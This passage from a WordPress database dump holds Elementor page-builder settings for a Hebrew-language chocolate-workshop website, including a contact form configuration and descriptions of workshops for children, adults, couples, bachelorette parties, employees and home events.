Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\",\"recaptcha_badge\":\"bottomright\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\",\"recaptcha_badge\":\"bottomright\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\",\"recaptcha_badge\":\"bottomright\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"submit_actions\":[\"email\",\"webhook\"]},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7304a39f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"7c05bf41\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d6394c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7554346f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d4\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05d4\\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea, \\u05e2\\u05dc\\u05d9\\u05db\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05e7\\u05d7\\u05ea \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05d5\\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8, \\u05ea\\u05dc\\u05d5\\u05d9 \\u05d1\\u05db\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05de\\u05d5\\u05d1\\u05df \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05e0\\u05e8 \\u05d5\\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05df, \\u05e0\\u05e9\\u05d0\\u05d9\\u05e8 \\u05dc\\u05db\\u05dd \\u05db\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d9\\u05d9\\u05e9\\u05d0\\u05e8, \\u05d6\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9 \\u05dc\\u05d7\\u05dc\\u05d5\\u05d8\\u05d9\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05dc\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05d0\\u05ea\\u05dd \\u05de\\u05d7\\u05dc\\u05d9\\u05d8\\u05d9\\u05dd \\u05d0\\u05dd \\u05d6\\u05d4 \\u05d1\\u05d1\\u05d5\\u05e7\\u05e8 \\u05d0\\u05d5 \\u05d1\\u05e2\\u05e8\\u05d1, \\u05dc\\u05d0 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"5ff16944\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3470d199\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2065,406,'_elementor_version','2.7.5'),(2066,406,'_elementor_template_type','wp-post'),(2067,406,'_elementor_pro_version','2.7.3'),(2071,370,'_elementor_edit_mode','builder'),(2072,370,'_elementor_template_type','wp-page'),(2073,370,'_elementor_version','2.9.8'),(2074,370,'_elementor_pro_version','2.9.4'),(2075,370,'_wp_page_template','elementor_header_footer'),(2076,370,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2077,370,'_elementor_data','[{\"id\":\"e02bb57\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c37663b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9a95b77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"align\":\"center\",\"header_size\":\"h1\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":59,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b21e8f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d18fa46\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2529b3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05d0\\u05d9\\u05d6\\u05d4 \\u05d8\\u05d9\\u05e4\\u05d5\\u05e1\\u05d9\\u05dd \\u05d0\\u05ea\\u05dd? \\u05de\\u05e8\\u05d9\\u05e8, \\u05d7\\u05dc\\u05d1 \\u05d0\\u05d5 \\u05dc\\u05d1\\u05df? \\u05db\\u05df \\u05d4\\u05db\\u05d5\\u05d5\\u05e0\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05d3\\u05e8\\u05da \\u05db\\u05dc \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d0\\u05db\\u05d5\\u05dc. \\u05db\\u05de\\u05e2\\u05d8 \\u05db\\u05d5\\u05dc\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05ea\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e6\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d5 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05e7\\u05d1\\u05d5\\u05e2. \\u05d1\\u05d9\\u05df \\u05d0\\u05dd \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d1\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05d0\\u05d5 \\u05d1\\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea, \\u05d1\\u05d2\\u05dc\\u05d9\\u05d3\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05e2\\u05d9\\u05de\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d1\\u05d8\\u05d1\\u05dc\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e4\\u05e9\\u05d5\\u05d8\\u05d4 \\u05e9\\u05e7\\u05e0\\u05d9\\u05ea\\u05dd \\u05dc\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d4 \\u05d1\\u05e1\\u05d5\\u05e4\\u05e8. \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05e9 \\u05d9\\u05db\\u05d5\\u05dc\\u05ea \\u05dc\\u05d4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d0\\u05ea \\u05de\\u05e6\\u05d1 \\u05d4\\u05e8\\u05d5\\u05d7, \\u05dc\\u05e9\\u05de\\u05d7 \\u05d5\\u05dc\\u05e8\\u05d5\\u05de\\u05dd, \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05e0\\u05d5 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d5\\u05d8\\u05d5\\u05d1 \\u05e2\\u05dc \\u05d4\\u05dc\\u05d1.<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"528c897\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f245b9c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d4f8d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_23615471_s-2019-1.jpg\",\"id\":411},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05ea\\u05e2\\u05e1\\u05d5\\u05e7\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d7\\u05d5\\u05e4\\u05e9, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05d0\\u05d9\\u05d7\\u05d5\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9. \\u05dc\\u05db\\u05dc \\u05de\\u05e7\\u05e8\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05dc\\u05e2\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 \\u05ea\\u05d9\\u05e9\\u05db\\u05d7.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-kids\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"59b08ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"661603b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_243662986_s-2019-1.jpg\",\"id\":413},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd\",\"description_text\":\"\\u05db\\u05d9 \\u05d0\\u05d9\\u05df \\u05d2\\u05d9\\u05dc \\u05dc\\u05e9\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d2\\u05dd \\u05dc\\u05e0\\u05d5 \\u05d4\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05de\\u05d5\\u05ea\\u05e8 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea \\u05d1\\u05d4 \\u05e0\\u05db\\u05d9\\u05df \\u05d3\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05e0\\u05d8\\u05e2\\u05dd \\u05d5\\u05e0\\u05dc\\u05de\\u05d3 \\u05e2\\u05dc \\u05d4\\u05d3\\u05d1\\u05e8 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4 \\u05e9\\u05e0\\u05e7\\u05e8\\u05d0 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/adult-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4b95460\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c0c0b4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_62137823_s-2019-1.jpg\",\"id\":414},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"description_text\":\" \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05dc\\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7\\u05d5 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05d2\\u05dd \\u05db\\u05de\\u05ea\\u05e0\\u05d4 \\u05d0\\u05d5 \\u05db\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d4 \\u05d1\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-couples\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7b7ce5f\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5817cff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7a1d0cb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_53956819_s-2019-1.jpg\",\"id\":416},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"description_text\":\"\\u05d4\\u05d7\\u05d1\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05de\\u05ea\\u05d7\\u05ea\\u05e0\\u05ea \\u05d5\\u05d0\\u05ea \\u05de\\u05d0\\u05e8\\u05d2\\u05e0\\u05ea \\u05dc\\u05d4 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d8\\u05e8\\u05e7\\u05e6\\u05d9\\u05d4 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05e0\\u05db\\u05d5\\u05df, \\u05e0\\u05de\\u05d0\\u05e1 \\u05de\\u05db\\u05dc \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e0\\u05d3\\u05d5\\u05e9\\u05d5\\u05ea \\u05d5\\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d7\\u05d3\\u05e9. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea  \\u05dc\\u05d2\\u05d5\\u05d5\\u05df  \\u05d0\\u05ea \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e9\\u05d2\\u05e8\\u05ea\\u05d9\\u05d5\\u05ea \\u05d5\\u05de\\u05d1\\u05d8\\u05d9\\u05d7\\u05d4 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d9\\u05d4 \\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05ea \\u05dc\\u05db\\u05dc\\u05d4 \\u05dc\\u05e2\\u05ea\\u05d9\\u05d3 \\u05d5\\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-bachelorette-party\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"ce1b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"23fa8d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_247319794_s-2019-1.jpg\",\"id\":418},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05e2\\u05d3\\u05ea \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d9\\u05d5\\u05dd \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05d0\\u05d5 \\u05e2\\u05e8\\u05d1 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05db\\u05d9\\u05d9\\u05e4\\u05d9 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05de\\u05e8\\u05d2\\u05e9\\u05ea \\u05d5\\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05d7\\u05ea.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/?page_id=100\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"3a32e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a0f0677\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_72660625_s-2019-1.jpg\",\"id\":420},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05dc\\u05d4\\u05e4\\u05d9\\u05e7 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05de\\u05d1\\u05dc\\u05d9 \\u05dc\\u05e6\\u05d0\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05ea. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea, \\u05e2\\u05e8\\u05d1\\u05d9 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9, \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 